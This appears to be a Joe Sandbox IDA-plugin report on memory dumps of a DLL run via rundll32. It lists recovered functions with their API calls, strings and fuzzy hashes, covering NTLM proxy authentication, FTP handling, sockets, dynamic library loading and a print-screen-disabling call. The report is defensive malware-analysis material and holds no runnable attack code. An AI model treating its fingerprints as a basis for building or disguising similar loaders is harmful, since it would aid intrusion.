Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: htons
String ID: .localhost$127.0.0.1$::1$Hostname %s was found in DNS cache$localhost
API String ID: 4207154920-2796519411
Opcode ID: 88c7a7f00708ff67fb2e92cf96c7cbcd6a41675bdaaa6324eee1bd67761225fc
Instruction ID: 832d78ba1b6584d66cc1d7d2cddfcbcc268c7004bb30cca0a67598f82a086c8f
Opcode Fuzzy Hash: 88c7a7f00708ff67fb2e92cf96c7cbcd6a41675bdaaa6324eee1bd67761225fc
Instruction Fuzzy Hash: 8ED1EF7190C306AFF715CFA4DC40BAAB7E4AF65308F044A1DE8A857282E3719549CB93

Function 6D035160 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 209COMMON

Download Yara Rule

APIs

__vfprintf_l.LIBCMT ref: 6D035325
__vfprintf_l.LIBCMT ref: 6D0353DE

Strings

X, xrefs: 6D0351F9
%sAuthorization: NTLM %s, xrefs: 6D035356, 6D03540B
NTLM, xrefs: 6D035164
Proxy-, xrefs: 6D03534D, 6D035355, 6D035402, 6D03540A
HTTP, xrefs: 6D035172, 6D0353A0

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: __vfprintf_l
String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-$X
API String ID: 86772892-3397526524
Opcode ID: 0a9ebe31e00040227b9a11513155a18d16bab4520a6d0251c6f59741d072edd7
Instruction ID: df480757f779fa1e55851f3978cd43ee5540674a66fca65d4281c4bbdc87e793
Opcode Fuzzy Hash: 0a9ebe31e00040227b9a11513155a18d16bab4520a6d0251c6f59741d072edd7
Instruction Fuzzy Hash: 01815EB59083519FEB01DF68C844B6BB7F4BF8A348F050929F988DB211E776D9148B93

Function 04EC6620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 182threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 04EB29FE: _malloc.LIBCMT ref: 04EB2A18

_memset.LIBCMT ref: 04EC6668
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC6759
CreateThread.KERNEL32(00000000,00000000,Function_00013690,Function_00016200,00000000,00000000), ref: 04EC6779
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC678A
CloseHandle.KERNEL32(?), ref: 04EC6797
CreateThread.KERNEL32(00000000,00000000,Function_00016200,00000000,00000000,00000000), ref: 04EC6845

Strings

yxxx, xrefs: 04EC6697

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Create$Thread$CloseEventHandleObjectSingleWait_malloc_memset
String ID: yxxx
API String ID: 3710809023-3567846162
Opcode ID: 2e31aa0b2b40705f39008022a0e4fd7a246a66afe2fc46caebef11f7f17f9969
Instruction ID: 5c4a76bba3f5d1a0e57463ac7c26ebe571fc286b2983550608279fcbec8d9e8b
Opcode Fuzzy Hash: 2e31aa0b2b40705f39008022a0e4fd7a246a66afe2fc46caebef11f7f17f9969
Instruction Fuzzy Hash: F6614D71E002189BDB24DF24DC81BDAB7B5EF48314F0441E9EA49AF381DA75BE85CB80

Function 6D02E300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 131networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 6D02E361
htons.WS2_32(?), ref: 6D02E376
send.WS2_32(?,?,00000003,00000000), ref: 6D02E407
WSAGetLastError.WS2_32 ref: 6D02E413
send.WS2_32(?,?,00000002,00000000), ref: 6D02E44B
WSAGetLastError.WS2_32 ref: 6D02E451

Strings

Sending data failed (%d), xrefs: 6D02E416, 6D02E454

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLasthtonssend
String ID: Sending data failed (%d)
API String ID: 2027122571-2319402659
Opcode ID: 178403bd3559c48cd7a199842cdea9cf53ad90abba196416a35f9f791b1af65a
Instruction ID: 3fdd0ddcf6434cf8c3a563034e2acc6667a3b4cd8c1fb9523105ce791c3c757c
Opcode Fuzzy Hash: 178403bd3559c48cd7a199842cdea9cf53ad90abba196416a35f9f791b1af65a
Instruction Fuzzy Hash: 1F41F3705492428FE716CF38CC80EA97BB9FF89310F340659E956DB292D7309A11CBA2

Function 6D04C720 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6D04C757
___except_validate_context_record.LIBVCRUNTIME ref: 6D04C75F
_ValidateLocalCookies.LIBCMT ref: 6D04C7E8
__IsNonwritableInCurrentImage.LIBCMT ref: 6D04C813
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,00000001), ref: 6D04C82C
_ValidateLocalCookies.LIBCMT ref: 6D04C868

Strings

csm, xrefs: 6D04C7FD

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentDisableImageNonwritablePrintScreen@@___except_validate_context_record
String ID: csm
API String ID: 980084377-1018135373
Opcode ID: 0853e776c67212fc5359c2549198faa0f24b5601a8938910786ccb4252050c47
Instruction ID: e8085695e886b3ce36eb2717b91676127993d8d1e6477f52ba46ae59e48e2bd1
Opcode Fuzzy Hash: 0853e776c67212fc5359c2549198faa0f24b5601a8938910786ccb4252050c47
Instruction Fuzzy Hash: 3E416234A04219EBDF00DF68C880FAE7BB5FF45328F15C169E919AB391D7319919CB94

Function 04EC5350 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,?), ref: 04EC5370
GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 04EC537F
LoadLibraryA.KERNEL32(?), ref: 04EC53BE

Part of subcall function 04EB359D: _malloc.LIBCMT ref: 04EB35AB

GetProcAddress.KERNEL32(00000000,?), ref: 04EC542C
FreeLibrary.KERNEL32(?), ref: 04EC5473

Strings

IsBadReadPtr, xrefs: 04EC5376
kernel32.dll, xrefs: 04EC5361

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Library$AddressLoadProc$Free_malloc
String ID: IsBadReadPtr$kernel32.dll
API String ID: 1447571555-2271619998
Opcode ID: 4c93990ba21179558756ae70268926dbe39c2229d90372b49aaf60ce341ed50b
Instruction ID: b918e6bf72bc1ccbebcf53a82cf9ebb0ba28ae16cdd94e69e0864b87216a98d7
Opcode Fuzzy Hash: 4c93990ba21179558756ae70268926dbe39c2229d90372b49aaf60ce341ed50b
Instruction Fuzzy Hash: C94149B1A00626EBDB10CF65C984A6EB7B8FF44709F15906DDD56A7241EB34FD02CBA0

Function 6D01A850 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,6D008B2F,00000000,?,00000100,?,?,?,?,?,?,?), ref: 6D01A853
_strncpy.LIBCMT ref: 6D01A89A
_strrchr.LIBCMT ref: 6D01A8DA
_strrchr.LIBCMT ref: 6D01A8F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D01A921
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D01A92C

Strings

Unknown error %d (%#x), xrefs: 6D01A8C4

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$_strrchr$_strncpy
String ID: Unknown error %d (%#x)
API String ID: 1320708361-2414550090
Opcode ID: 8211643c6de02276226b1022e9e141c2e5f0595db5095ec0453ff37411a498f4
Instruction ID: 848aefadd7df38824b60176e3636813859dac731c0d8aab6f4892f6214e990b4
Opcode Fuzzy Hash: 8211643c6de02276226b1022e9e141c2e5f0595db5095ec0453ff37411a498f4
Instruction Fuzzy Hash: 9A21E26160C2056EF7015BF4AC84F3F7BECDF5225DF220069FD0197292EB25984A87B2

Function 04EC37E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC37EC
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 04EC3807
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC3811
FreeLibrary.KERNEL32(00000000), ref: 04EC3825

Strings

kernel32.dll, xrefs: 04EC37E7
GetCurrentProcess, xrefs: 04EC3809
IsWow64Process, xrefs: 04EC37FA

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
API String ID: 2256533930-2522683910
Opcode ID: d04a780193e66664df2c201d6dc533425395594fdcb569cecf99055098fb8f48
Instruction ID: 0ad00dc6770eafd2e597779cf05bb48106841a701fa63befd2e4f723d49a206b
Opcode Fuzzy Hash: d04a780193e66664df2c201d6dc533425395594fdcb569cecf99055098fb8f48
Instruction Fuzzy Hash: C4F0EC7650131CBFD71097A5ED46EAFB76CDF45B51B100159FC04932009B75BD0246F4

Function 6CFF59C7 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5A10
__alloca_probe_16.LIBCMT ref: 6CFF5A3C
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5A7B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5A98
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5AD7
__alloca_probe_16.LIBCMT ref: 6CFF5AF4
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5B36
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5B59

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: bf8a21600ff9ec3e323f8656af19202ed70936da623c109980ef04cd4df5fc5e
Instruction ID: 0e867ce08b6c586ae5a61aea1fe62d530fc8f66ad2d04595cb721ee74c18030d
Opcode Fuzzy Hash: bf8a21600ff9ec3e323f8656af19202ed70936da623c109980ef04cd4df5fc5e
Instruction Fuzzy Hash: 7F517E7260121AABEF108F65CC44FAF7BB9EF45758F218125FE24A75A4D731C912CB60

Function 04EC73B0 Relevance: 12.1, APIs: 8, Instructions: 53synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,762323A0,?,04EC4875), ref: 04EC73E2
CloseHandle.KERNEL32(?), ref: 04EC73EF
CloseHandle.KERNEL32(?,762323A0,?,04EC4875), ref: 04EC73F8
DeleteCriticalSection.KERNEL32(?), ref: 04EC7401
WSACleanup.WS2_32 ref: 04EC7407
VirtualFree.KERNEL32(?,00000000,00008000), ref: 04EC7429
VirtualFree.KERNEL32(?,00000000,00008000), ref: 04EC7441
VirtualFree.KERNEL32(?,00000000,00008000), ref: 04EC7459

Part of subcall function 04EC7200: setsockopt.WS2_32(?,0000FFFF,00000080,04ECCA88,00000004), ref: 04EC7222
Part of subcall function 04EC7200: CancelIo.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC722F
Part of subcall function 04EC7200: InterlockedExchange.KERNEL32(?,00000000), ref: 04EC723E
Part of subcall function 04EC7200: closesocket.WS2_32(?), ref: 04EC724B
Part of subcall function 04EC7200: SetEvent.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC7258

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: FreeVirtual$CloseHandle$CancelCleanupCriticalDeleteEventExchangeInterlockedObjectSectionSingleWaitclosesocketsetsockopt
String ID:
API String ID: 1236122821-0
Opcode ID: 76d4479af7893c0f68068143243440f509421e8f6f5785da5fab550584c4953a
Instruction ID: f6e2a0d2f8ef3987651dd58522489964cdeb98ff0688402dec532fda0f8ed3d8
Opcode Fuzzy Hash: 76d4479af7893c0f68068143243440f509421e8f6f5785da5fab550584c4953a
Instruction Fuzzy Hash: 1211A070600B029BD230AB36ED09B47B3E8AF44711F105A1CA9A1A32D0CB74F806CF61

Function 6D05FA4B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6D05FAD1

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a9ea7d503aef376854bfeb198136d6e2439b39079f2ffa017acdb92599557e1b
Instruction ID: 02020b934feb0d7d98ad413528ebe9e064ca0d1cd3601957393447d9a9b139c5
Opcode Fuzzy Hash: a9ea7d503aef376854bfeb198136d6e2439b39079f2ffa017acdb92599557e1b
Instruction Fuzzy Hash: F2B12472904256DFFB028F64CE91BEE7FA9EF46314F158165EE04AF281E3789911C7A0

Function 6D04CCF1 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 6D04CE10
___TypeMatch.LIBVCRUNTIME ref: 6D04CF1E
CallUnexpected.LIBVCRUNTIME ref: 6D04D08B

Strings

csm, xrefs: 6D04CD9B
csm, xrefs: 6D04CD2E
csm, xrefs: 6D04CE47

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: c3b6bf9cca779ebda40b9f96ab3f2473ebf25a461350b18d696fb6235b179180
Instruction ID: 012c3f52a26fd551dcd75580220761b0e1d36b36b9be6312ffce7783b3fc2451
Opcode Fuzzy Hash: c3b6bf9cca779ebda40b9f96ab3f2473ebf25a461350b18d696fb6235b179180
Instruction Fuzzy Hash: 81B19A7180420AEFEF05CFA5C880FAEBBB5BF49314B11816AE9106B211D735DA56CBA5

Function 6D026480 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 256COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6D026513
_strncpy.LIBCMT ref: 6D026576

Strings

Uploading to a URL without a file name, xrefs: 6D0265DF
path contains control characters, xrefs: 6D0264D3
Request has same path as previous transfer, xrefs: 6D026787

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strncpy_strrchr
String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
API String ID: 3975226627-4131979473
Opcode ID: 76cde709543ee9de113eaf3b59ae39718f96b2cde71774fbacb77738b89378a4
Instruction ID: f75d90349d001c2e5a87946b28ec65e0731ba746a262bfc31beacd0ba2431927
Opcode Fuzzy Hash: 76cde709543ee9de113eaf3b59ae39718f96b2cde71774fbacb77738b89378a4
Instruction Fuzzy Hash: 7491F5746093438FFB118F24A848BBB7BE5AF81308F94043CE9599B242E772E519C7D5

Function 6D026950 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 188networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D026B22

Part of subcall function 6D0432A0: WSAGetLastError.WS2_32 ref: 6D043361

Strings

We got a 421 - timeout, xrefs: 6D026AC0
FTP response timeout, xrefs: 6D026B63
FTP response aborted due to select/poll error: %d, xrefs: 6D026B29
QUOT string not accepted: %s, xrefs: 6D026B48
*, xrefs: 6D026AE5

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout
API String ID: 1452528299-64802194
Opcode ID: 7c013df3153b9e872788b6545c4712ef1fa23729c2f3e6ac2b25c4c62e407bde
Instruction ID: e8fccd960d21d354169c7f8f074ae6c90a691820b22e19c18f8d0a506c7c8b43
Opcode Fuzzy Hash: 7c013df3153b9e872788b6545c4712ef1fa23729c2f3e6ac2b25c4c62e407bde
Instruction Fuzzy Hash: 0751F5759093025FF7018B18DC40BBBB7E8EF86318F848569FE6887251EB35D6098BD2

Function 6CFFF660 Relevance: 10.7, APIs: 7, Instructions: 187COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001), ref: 6CFFF6FD

Part of subcall function 6D01BDE0: socket.WS2_32 ref: 6D01BE0A
Part of subcall function 6D01BDE0: htonl.WS2_32(7F000001), ref: 6D01BE2F
Part of subcall function 6D01BDE0: setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000006,00000004), ref: 6D01BE64
Part of subcall function 6D01BDE0: bind.WS2_32(00000000,?,00000010), ref: 6D01BE7B
Part of subcall function 6D01BDE0: getsockname.WS2_32(00000000,?,00000002), ref: 6D01BE95
Part of subcall function 6D01BDE0: listen.WS2_32(00000000,00000001), ref: 6D01BEB2
Part of subcall function 6D01BDE0: socket.WS2_32(00000002,00000001,00000000), ref: 6D01BEC7
Part of subcall function 6D01BDE0: connect.WS2_32(00000000,?,00000010), ref: 6D01BEDC
Part of subcall function 6D01BDE0: accept.WS2_32(00000000,00000000,00000000), ref: 6D01BF25

Part of subcall function 6D01C660: WaitForSingleObjectEx.KERNEL32(6CFFF4D0,000000FF,00000000,?,0000000F,6CFFF4D0,?), ref: 6D01C66C
Part of subcall function 6D01C660: CloseHandle.KERNEL32(6CFFF4D0), ref: 6D01C678

closesocket.WS2_32(?), ref: 6CFFF739
DeleteCriticalSection.KERNEL32(?), ref: 6CFFF749
closesocket.WS2_32(?), ref: 6CFFF77F
EnterCriticalSection.KERNEL32(?), ref: 6CFFF837
LeaveCriticalSection.KERNEL32(?), ref: 6CFFF84A
closesocket.WS2_32(?), ref: 6CFFF89C

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CriticalSection$closesocket$socket$CloseDeleteEnterHandleInitializeLeaveObjectSingleWaitacceptbindconnectgetsocknamehtonllistensetsockopt
String ID:
API String ID: 3309228083-0
Opcode ID: afe1b3450f34aec3678021db36c8bdc933ca15e8d5249a6f279320d9add8722f
Instruction ID: eab26646cc42f87f9e5a8bf814014c4651271e896cadfb818e271b5cbc084091
Opcode Fuzzy Hash: afe1b3450f34aec3678021db36c8bdc933ca15e8d5249a6f279320d9add8722f
Instruction Fuzzy Hash: FB6116B1405306AFEB019F65DC4474ABBB4FF06319F144238F928AB691D771E065CFA1

Function 6CFF18D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CFF1953
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CFF199F
__Getctype.LIBCPMT ref: 6CFF19B8
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CFF19D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF1A69

Strings

bad locale name, xrefs: 6CFF1A87

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: a0507934d40f3f2b9c38c4ef023dac1684c477aa1c1994c77046206eb82f3217
Instruction ID: f886d380f4c7a2f0c0d75448b67fb3e4be078b06c34fb89b3d19b2d7bd1e5366
Opcode Fuzzy Hash: a0507934d40f3f2b9c38c4ef023dac1684c477aa1c1994c77046206eb82f3217
Instruction Fuzzy Hash: 85515EF1D053489BEF00CFA4D844B9EBBB8EF14318F148129D924AB791E775E519CB92

Function 6D027C90 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 154COMMON

Download Yara Rule

Strings

%s%s%s, xrefs: 6D027DA2
Got a %03d response code instead of the assumed 200, xrefs: 6D027CC9
Couldn't set desired mode, xrefs: 6D027CAB
NLST, xrefs: 6D027D7D, 6D027DA1
LIST, xrefs: 6D027D82

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
